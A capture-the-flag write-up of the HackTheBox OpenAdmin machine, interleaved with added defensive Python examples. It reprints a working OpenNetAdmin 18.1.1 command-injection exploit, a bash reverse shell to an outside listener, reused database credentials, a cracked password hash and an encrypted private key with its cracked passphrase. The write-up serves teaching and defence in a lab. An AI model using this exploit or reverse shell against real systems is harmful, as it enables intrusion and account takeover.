HackTheBox – OpenAdmin Write-up

Hi everyone!

Today’s post is on OpenAdmin, an easy GNU/Linux machine on HackTheBox, although many people, myself included, feel that it is closer to a medium-rated machine. OpenAdmin was launched on 5th January 2020. This machine focuses on an OpenNetAdmin 18.1.1 CVE to gain access to the server, a bad password habit (password reuse) for pivoting to a user account, file enumeration to reach a third user account, cracking an encrypted SSH private key for its passphrase, and the nano GTFOBins entry for privilege escalation. Read on if you are interested. Let’s get started!

Fig 1. OpenAdmin machine on HackTheBox

Tools required

Nmap analysis

As usual, we first start with enumerating all the available services/ports in the machine using Nmap.

┌──(soulx㉿kali)-[~]
└─$ IP=10.10.10.171

┌──(soulx㉿kali)-[~]
└─$ nmap -A -p1-9999 -v $IP
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-15 23:25 +08
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:25
Completed NSE at 23:25, 0.00s elapsed
Initiating NSE at 23:25
Completed NSE at 23:25, 0.00s elapsed
Initiating NSE at 23:25
Completed NSE at 23:25, 0.00s elapsed
Initiating Ping Scan at 23:25
Scanning 10.10.10.171 [2 ports]
Completed Ping Scan at 23:25, 0.14s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:25
Completed Parallel DNS resolution of 1 host. at 23:25, 0.20s elapsed
Initiating Connect Scan at 23:25
Scanning 10.10.10.171 [9999 ports]
Discovered open port 80/tcp on 10.10.10.171
Discovered open port 22/tcp on 10.10.10.171
Increasing send delay for 10.10.10.171 from 0 to 5 due to max_successful_tryno increase to 4
Connect Scan Timing: About 18.20% done; ETC: 23:28 (0:02:19 remaining)
Connect Scan Timing: About 33.30% done; ETC: 23:28 (0:02:02 remaining)
Connect Scan Timing: About 46.93% done; ETC: 23:28 (0:01:43 remaining)
Connect Scan Timing: About 62.99% done; ETC: 23:28 (0:01:11 remaining)
Connect Scan Timing: About 77.55% done; ETC: 23:28 (0:00:44 remaining)
Completed Connect Scan at 23:28, 199.08s elapsed (9999 total ports)
Initiating Service scan at 23:28
Scanning 2 services on 10.10.10.171
Completed Service scan at 23:28, 6.31s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.171.
Initiating NSE at 23:28
Completed NSE at 23:28, 4.36s elapsed
Initiating NSE at 23:28
Completed NSE at 23:28, 0.59s elapsed
Initiating NSE at 23:28
Completed NSE at 23:28, 0.00s elapsed
Nmap scan report for 10.10.10.171
Host is up (0.14s latency).
Not shown: 9997 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 23:28
Completed NSE at 23:28, 0.00s elapsed
Initiating NSE at 23:28
Completed NSE at 23:28, 0.00s elapsed
Initiating NSE at 23:28
Completed NSE at 23:28, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 212.24 seconds

We can see that SSH is available on port 22 and there is a website at port 80. Let’s go to the website and take a look.

Overview of the website

The website shown to us is just the default Apache page.

Fig 4a. Main page of http://10.10.10.171

I tried to look at robots.txt on the website, but it does not exist. Therefore, I had to do some directory fuzzing with DirBuster.

┌──(soulx㉿kali)-[~/…/CTF/HackTheBox/Machines/OpenAdmin]
└─$ dirbuster http://$IP -l /usr/share/wordlists/dirbuster/directory-list-1.0.txt -e pl,php,html,jsp,sh,txt                        
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Starting OWASP DirBuster 1.0-RC1
Starting dir/file list based brute forcing
Dir found: / - 200
Dir found: /music/ - 200
Dir found: /icons/ - 403
File found: /music/index.html - 200
File found: /ona - 301
File found: /music/category.html - 200
File found: /music/playlist.html - 200
File found: /music/artist.html - 200
File found: /music/blog.html - 200
File found: /music/contact.html - 200
Dir found: /music/img/ - 200
Dir found: /music/img/icons/ - 200
Dir found: /ona/ - 200
Dir found: /music/img/concept/ - 200
Dir found: /music/img/premium/ - 200
Dir found: /music/js/ - 200
Dir found: /music/img/playlist/ - 200
......
File found: /index.html - 200
File found: /ona/index.php - 200

There are a lot of results, but I chose to show only the interesting ones. We can see that there are /music/, /icons/ and /ona/ folders, among others.

If we look at the /music/ folder, some of the buttons/pages work while others just redirect to the same page.

I browsed around and nothing was interesting, so I decided to look at the /ona/ folder.

We can see from the yellow box at the top left that the installed OpenNetAdmin (ona) is not the latest version. A quick Google search shows that version 18.1.1 is vulnerable to command injection through its ping feature, which results in Remote Code Execution (RCE). You can read more about the technical details, such as why ws_ping() is vulnerable, in the research by Nairuz Abulhul here.
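The bug class behind ws_ping() is a shell command built from a user-controlled value. The following is an added example (not OpenNetAdmin's code and not from the write-up) that shows the vulnerable construction beside a hardened handler that validates the target and never involves a shell, plus a small detection helper for logging attempts against such an endpoint. The function names, the hostname regex and the sample inputs are this example's own constructions.

```python
"""Safe handling of a user-supplied ping target.

Added example (not OpenNetAdmin's code, not from the write-up): it shows
the bug class behind ws_ping(), a shell command built from the 'ip'
parameter, beside a hardened handler. The function names, the hostname
regex and the sample inputs are this example's own constructions.
"""
import ipaddress
import re
import subprocess

# RFC 1123 style hostname: dot-separated labels, no shell metacharacters possible.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)
# Characters that have no place in an IP or hostname but do in an injected command.
_SHELL_META_RE = re.compile(r"[;&|`$<>(){}\n\r\"']")


def build_command_unsafe(ip: str) -> str:
    """The vulnerable pattern: untrusted input interpolated into a shell string.
    Everything after a ';' in `ip` becomes a second command. Returned as a
    string for inspection only; it is never executed here."""
    return f"ping -c 1 {ip}"


def validate_target(target: str) -> str:
    """Return the target if it is an IP literal or a plain hostname, else raise."""
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if _HOSTNAME_RE.match(target):
        return target
    raise ValueError(f"invalid ping target: {target!r}")


def is_valid_target(target: str) -> bool:
    try:
        validate_target(target)
        return True
    except ValueError:
        return False


def build_safe_argv(target: str) -> list:
    """Validated target as its own argv element; no shell is involved at all."""
    return ["ping", "-c", "1", validate_target(target)]


def safe_ping(target: str, timeout: float = 5.0) -> bool:
    """Run ping without a shell; returns True when the host answered."""
    try:
        proc = subprocess.run(build_safe_argv(target), capture_output=True, timeout=timeout)
        return proc.returncode == 0
    except (OSError, subprocess.TimeoutExpired):
        return False


def looks_like_injection(value: str) -> bool:
    """Detection helper for request logging/alerting on the ping endpoint."""
    return bool(_SHELL_META_RE.search(value))


# Constructed inputs: two legitimate targets and one shaped like the PoC payload above.
CONSTRUCTED_INPUTS = [
    "10.10.10.171",
    "internal.openadmin.htb",
    '>;echo "BEGIN";id 2>&1;echo "END"',
]


def triage(values=CONSTRUCTED_INPUTS) -> dict:
    """Classify each submitted value: accepted, or rejected (and whether it looks hostile)."""
    return {v: ("accepted" if is_valid_target(v) else
                "rejected-injection" if looks_like_injection(v) else "rejected")
            for v in values}
```

The validation is the first line of defence, but the important change is `build_safe_argv`: the target is passed as a separate argv element, so even a value that slipped past validation could not start a second command. `looks_like_injection` is only for alerting; it must never replace the allow-list check, because a denylist of metacharacters is easy to get wrong.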

Accessing web server via OpenNetAdmin v18.1.1 vulnerability

A quick GitHub search turned up a working exploit by amriunix: https://github.com/amriunix/ona-rce

#!/usr/bin/python3

'''
# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2020-01-18
# Exploit Author: @amriunix (https://amriunix.com)
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
'''

import requests
import sys
from urllib3.exceptions import InsecureRequestWarning

# Suppress only the single warning from urllib3 needed.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def helper(filename):
    print("\n[-] Usage: python3 " + filename + " [check | exploit] <URL>")
    print("\n[*] Options:")
    print("\t[+] check    : Verify if the target is vulnerable")
    print("\t[+] exploit  : Exploiting the target\n")
    exit(1)
def check(target):
    try:
        req = requests.get(url = target, verify = False)
    except:
        print("[-] Warning: Error while connecting to the remote target")
        exit(1)
    return('v18.1.1' in req.text)

def exploit(target, cmd):
    payload = {
        'xajax':'window_submit',
        'xajaxr':'1574117726710',
        'xajaxargs[]':['tooltips','ip=>;echo \"BEGIN\";{} 2>&1;echo \"END\"'.format(cmd),'ping']
    }
    try:
        req = requests.post(url = target, data = payload, verify = False)
    except:
        print("[-] Warning: Error while connecting to the remote target")
        exit(1)
    data = req.text
    result = data[data.find('BEGIN')+6:data.find('END')-1]
    return(result)

if __name__ == '__main__':
    print('[*] OpenNetAdmin 18.1.1 - Remote Code Execution')
    filename = sys.argv[0]
    if len(sys.argv) != 3:
        helper(filename)
    else:
        print("[+] Connecting !")
        opt =  sys.argv[1].lower()
        target = sys.argv[2] + '/'
        if opt == 'check':
            if (check(target)):
                print("[+] The remote host is vulnerable!")
            else:
                print("[-] The remote host is NOT vulnerable!")
        elif opt == 'exploit':
            if (check(target)):
                print("[+] Connected Successfully!")
            else:
                print("[-] Warning: Error while connecting to the remote target")
            cmd = ''
            while(True):
                cmd = input('sh$ ').lower()  # note: the script lowercases the command before sending it
                if (cmd == 'exit'):
                    exit(0)
                print(exploit(target, cmd))
        else:
            print("[-] Warning: Command not found !")

As this only gives us Remote Code Execution (RCE), it is not a proper shell. Getting a shell matters because, say in HackTheBox’s Battlegrounds or in a real engagement, if the system gets patched we would lose our access; having one or more shell instances lets us keep access to the system. Therefore, I will send a bash reverse shell and have Netcat listen on a port for the incoming connection from the web server.

┌──(soulx㉿kali)-[~/…/CTF/HackTheBox/Machines/OpenAdmin]
└─$ nc -lvnp 1337          
listening on [any] 1337 ...

Once our Netcat is set up, we can run the exploit script and send a reverse bash command to the webserver.

┌──(soulx㉿kali)-[~/…/CTF/HackTheBox/Machines/OpenAdmin]
└─$ python3 ./ona_exploit.py exploit http://$IP
[*] OpenNetAdmin 18.1.1 - Remote Code Execution
[+] Connecting !
sh$ /bin/bash -c 'bash -i >& /dev/tcp/10.10.1.1/1337 0>&1'

Our Netcat should receive an incoming connection from the website server and a reverse shell is obtained.

┌──(soulx㉿kali)-[~/…/CTF/HackTheBox/Machines/OpenAdmin]
└─$ nc -lvnp 1337          
listening on [any] 1337 ...
connect to [10.10.1.1] from (UNKNOWN) [10.10.10.171] 53846
bash: cannot set terminal process group (1003): Inappropriate ioctl for device
bash: no job control in this shell
www-data@openadmin:/opt/ona/www$

If we try to go to the home directory, there is none for the account we are in: $HOME is not set for www-data.

www-data@openadmin:/opt/ona/www$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@openadmin:/opt/ona/www$ cd $HOME
cd $HOME
bash: cd: HOME not set

Therefore, we need to find what other user account(s) we can pivot to that may have the user flag.

Pivot to another user account and get user flag

Obtaining lists of users

We can first obtain a list of users via the file /etc/passwd.

www-data@openadmin:/opt/ona/www$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
joanna:x:1001:1001:,,,:/home/joanna:/bin/bash

We are interested in jimmy’s and joanna’s accounts as they have home directories, which might contain the user flag.

Pivoting to Jimmy’s account via bad password

The first thing that came to my mind was the MySQL database on the server. As the /ona/ folder has a login page at http://10.10.10.171/ona/login.php, there should be a database used to verify the login credentials.

Fig 6a. OpenNetAdmin login page at http://10.10.10.171/ona/login.php

After a quick Google search, I found out that the database settings are located at ona/www/local/config/database_settings.inc.php. Therefore, we can navigate to it and print its content.

www-data@openadmin:/opt/ona/www$ ls
ls
config
config_dnld.php
dcm.php
images
include
index.php
local
login.php
logout.php
modules
plugins
winc
workspace_plugins
www-data@openadmin:/opt/ona/www$ cd local/config
cd local/config
www-data@openadmin:/opt/ona/www/local/config$ ls
ls
database_settings.inc.php
motd.txt.example
run_installer
www-data@openadmin:/opt/ona/www/local/config$ cat database_settings.inc.php
cat database_settings.inc.php
<?php

$ona_contexts=array (
  'DEFAULT' => 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);

?>

I tried to use these credentials to access the MySQL database on localhost, dump the users table, and crack the MD5 hashes. However, the credentials inside are useless; the table only contains:

Username:Password
guest:test
admin:admin

Therefore, I decided to try the MySQL database password to log in to Jimmy’s and Joanna’s accounts. To my surprise, it was actually Jimmy’s password. This is an example of bad password practice: the same password is reused across services.

┌──(soulx㉿kali)-[~/…/CTF/HackTheBox/Machines/OpenAdmin]
└─$ ssh jimmy@$IP
jimmy@10.10.10.171's password: n1nj4W4rri0R!
jimmy@openadmin:~$

File enumeration for Joanna’s private SSH key

While searching through the files on the server, I noticed a folder that only Jimmy or members of the internal group can access. Joanna is in the internal group as well.

jimmy@openadmin:~$ cd /var/www
jimmy@openadmin:/var/www$ ls -al
total 16
drwxr-xr-x  4 root     root     4096 Nov 22  2019 .
drwxr-xr-x 14 root     root     4096 Nov 21  2019 ..
drwxr-xr-x  6 www-data www-data 4096 Nov 22  2019 html
drwxrwx---  2 jimmy    internal 4096 Nov 23  2019 internal
lrwxrwxrwx  1 www-data www-data   12 Nov 21  2019 ona -> /opt/ona/www
jimmy@openadmin:/var/www$ cd internal/
jimmy@openadmin:/var/www/internal$ ls
index.php  logout.php  main.php
jimmy@openadmin:/var/www/internal$ grep 'internal' /etc/group
jimmy:x:1000 joanna:x:1001

If we look at the running services using Netstat, we can see a strange listening service at port 52846.

jimmy@openadmin:/var/www/internal$ netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:52846         0.0.0.0:*               LISTEN     
tcp        0      0 10.10.10.171:22         10.10.14.24:40398       ESTABLISHED
tcp        0    208 10.10.10.171:22         10.10.14.24:40414       ESTABLISHED
tcp6       0      0 :::22                   :::*                    LISTEN     
tcp6       0      0 :::80                   :::*                    LISTEN     
udp        0      0 127.0.0.53:53           0.0.0.0:*
...

To verify whether it is Joanna who hosts the internal website on that port, we can look at the contents of /etc/apache2/sites-enabled/internal.conf.

jimmy@openadmin:/var/www/internal$ cat /etc/apache2/sites-enabled/internal.conf
Listen 127.0.0.1:52846

<VirtualHost 127.0.0.1:52846>
    ServerName internal.openadmin.htb
    DocumentRoot /var/www/internal

<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>

Since we now know that the internal website does run as Joanna, we can take a look at the files’ content.

jimmy@openadmin:/var/www/internal$ cat main.php 
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
jimmy@openadmin:/var/www/internal$ cat index.php
...
if (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) {
              if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1') {
                  $_SESSION['username'] = 'jimmy';
                  header("Location: /main.php");
              } else {
                  $msg = 'Wrong username or password.';
              }
            }
         ?>
      </div> <!-- /container -->

      <div class = "container">

         <form class = "form-signin" role = "form"
            action = "<?php echo htmlspecialchars($_SERVER['PHP_SELF']);
            ?>" method = "post">
            <h4 class = "form-signin-heading"><?php echo $msg; ?></h4>
            <input type = "text" class = "form-control"
               name = "username"
               required autofocus></br>
            <input type = "password" class = "form-control"
               name = "password" required>
            <button class = "btn btn-lg btn-primary btn-block" type = "submit"
               name = "login">Login</button>
         </form>
...

We can see that index.php is a login page where the username and password are verified before the user is sent to main.php, which prints Joanna’s private SSH RSA key on the page. From index.php, we can see that the username is “jimmy” while the password is checked against a SHA512 hash. We can use crackstation.net, an online cracker, to crack it for us.
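Two weaknesses are visible in the PHP above: index.php compares the password against an unsalted, unkeyed SHA512 digest (which is why an online lookup table recovers it instantly), and main.php calls header("Location: ...") for unauthenticated visitors but keeps executing, so the key is printed anyway. The following added example (not code from the box or the write-up) mirrors both patterns in Python beside their hardened forms. The user records, function names and PBKDF2 work factor are constructed; PAGE_HASH is the hash copied from index.php.

```python
"""Hardened login and page handling, contrasted with the internal site's PHP.

Added example, not code from the box or from the write-up. Two weaknesses
visible in index.php/main.php: (1) the password is compared with an unsalted
SHA512 digest, so a precomputed lookup table recovers it instantly; (2)
main.php sets a redirect header for unauthenticated visitors but keeps
executing, so the private key is printed anyway. User records, function
names and the work factor are constructed for this example.
"""
import hashlib
import hmac
import os
from typing import Optional

ITERATIONS = 600_000  # PBKDF2-HMAC-SHA256 work factor (constructed choice)
SECRET_PAGE = "<pre>SECRET_KEY_MATERIAL</pre>"  # stand-in for the id_rsa dump

# Hash copied from the index.php shown above, for replaying its check.
PAGE_HASH = ("00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758e"
             "ebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1")


def legacy_hash(password: str) -> str:
    """Equivalent of PHP hash('sha512', $password): fast, unsalted, and
    identical for every user who picks the same password."""
    return hashlib.sha512(password.encode()).hexdigest()


def legacy_check(password: str, stored_hex: str) -> bool:
    """Mirrors index.php's comparison (also not constant-time)."""
    return legacy_hash(password) == stored_hex


def page_hash_matches(candidate: str) -> bool:
    """Replays index.php's check against the hash it embeds."""
    return legacy_check(candidate, PAGE_HASH)


def make_record(password: str) -> dict:
    """Per-user random salt plus a slow KDF; parameters stored with the record."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return {"salt": salt.hex(), "iterations": ITERATIONS, "hash": digest.hex()}


def verify_record(record: dict, password: str) -> bool:
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(record["salt"]), record["iterations"])
    return hmac.compare_digest(digest.hex(), record["hash"])


# Constructed user store; "Revealed" is the password the write-up recovers.
USERS = {"jimmy": make_record("Revealed")}


def login(username: str, password: str) -> dict:
    """Session is only populated on a successful, constant-time verification."""
    record = USERS.get(username)
    if record is None or not verify_record(record, password):
        return {"status": 200, "session": None, "body": "Wrong username or password."}
    return {"status": 302, "session": {"username": username},
            "location": "/main.php", "body": ""}


def main_page_vulnerable(session: Optional[dict]) -> dict:
    """Mirrors main.php: sets a redirect, then renders the secret anyway."""
    response = {"status": 200, "body": ""}
    if not session or "username" not in session:
        response.update(status=302, location="/index.php")
        # no return here: execution falls through, exactly as PHP does without exit()
    response["body"] = SECRET_PAGE
    return response


def main_page_fixed(session: Optional[dict]) -> dict:
    """Redirect and stop: nothing sensitive is rendered for an unauthenticated request."""
    if not session or "username" not in session:
        return {"status": 302, "location": "/index.php", "body": ""}
    return {"status": 200, "body": SECRET_PAGE}
```

The second point is the one that matters most on this box: a redirect header is advice to the browser, not access control, and a client such as cURL that ignores the Location header still receives the body. In PHP the fix is an exit() (or return) right after header(); the salted, iterated hash with hmac.compare_digest addresses the first point.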

Fig 6b. Cracked SHA512 hash of Internal website’s password

Now that we know the password is Revealed, we can log in to the website using cURL.

jimmy@openadmin:/var/www/internal$ curl -d "username=jimmy&password=Revealed" -X POST http://localhost:52846/main.php
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D

kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8
ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO
ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE
6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ
ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du
y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI
9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4
piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/
/U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH
40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ
fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb
9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80
X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg
S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F
FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh
Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa
RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z
uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr
1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2
XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79
yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM
+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt
qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt
z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe
K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN
-----END RSA PRIVATE KEY-----
</pre><html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

Cracking Joanna’s SSH RSA private key

We first copy Joanna’s SSH RSA private key into a file called joanna_rsa. Then we locate ssh2john (installed with John the Ripper), run it on the key to produce a hash, and use John the Ripper on that hash to obtain the key’s passphrase. You can refer to this website on how to use it if you want.

┌──(soulx㉿kali)-[~/…/CTF/HackTheBox/Machines/OpenAdmin]
└─$ locate *ssh2john*
/usr/share/john/ssh2john.py

┌──(soulx㉿kali)-[~/…/CTF/HackTheBox/Machines/OpenAdmin]
└─$ /usr/share/john/ssh2john.py ./joanna_rsa > joanna_rsa.john

┌──(soulx㉿kali)-[~/…/CTF/HackTheBox/Machines/OpenAdmin]
└─$ john -wordlist=/usr/share/wordlists/rockyou.txt ./joanna_rsa.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas      (./joanna_rsa)
1g 0:00:00:09 DONE (2021-07-16 21:12) 0.1040g/s 1492Kp/s 1492Kc/s 1492KC/sa6_123..*7¡Vamos!
Session completed

Now that we know the passphrase is bloodninjas, we can use the SSH RSA private key and the passphrase to log in. Before using the key, we need to make it readable only by its owner with chmod 400; SSH refuses to use a private key whose permissions are too open.
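John's output above tells the defender's side of the story: the key is in the legacy PEM format (Proc-Type: 4,ENCRYPTED, DEK-Info: AES-128-CBC), whose passphrase-to-key derivation is a single MD5 round (KDF 0=MD5/AES, iteration count 1), so one rockyou word fell in nine seconds. The newer openssh-key-v1 format stores a bcrypt round count instead. The following added example (not part of the write-up or of any tool on the page) audits a key file for format, encryption, KDF strength and the chmod 400 point. Both sample keys are constructed header-only blobs, not real key material; the round threshold and finding texts are this example's own.

```python
"""Audit an SSH private key file: format, encryption, KDF strength and permissions.

Added example, not part of the write-up or of any tool on the page. Legacy
PEM keys derive the cipher key from the passphrase with a single MD5 round;
openssh-key-v1 keys store a bcrypt round count. Sample keys below are
constructed header-only blobs, not real key material; the round threshold
and finding texts are this example's own.
"""
import base64
import os
import stat
import struct
from typing import Optional

MAGIC = b"openssh-key-v1\x00"
MIN_BCRYPT_ROUNDS = 16  # ssh-keygen's default for -a; anything lower is a finding here

LEGACY_PEM_SAMPLE = b"""-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF

AAAA
-----END RSA PRIVATE KEY-----
"""


def _ssh_string(b: bytes) -> bytes:
    return struct.pack(">I", len(b)) + b


def _read_string(buf: bytes, off: int):
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4:off + 4 + n], off + 4 + n


def build_openssh_blob(cipher: bytes, kdf: bytes, rounds: int) -> bytes:
    """Construct the header of an openssh-key-v1 file (enough for an audit)."""
    kdfopts = _ssh_string(b"\x00" * 16) + struct.pack(">I", rounds) if kdf == b"bcrypt" else b""
    body = (MAGIC + _ssh_string(cipher) + _ssh_string(kdf) + _ssh_string(kdfopts)
            + struct.pack(">I", 1) + _ssh_string(b"pubkey-placeholder")
            + _ssh_string(b"privkey-placeholder"))
    return (b"-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.encodebytes(body)
            + b"-----END OPENSSH PRIVATE KEY-----\n")


def audit_key_text(text: bytes) -> dict:
    """Report format, whether encrypted, cipher, KDF and KDF rounds."""
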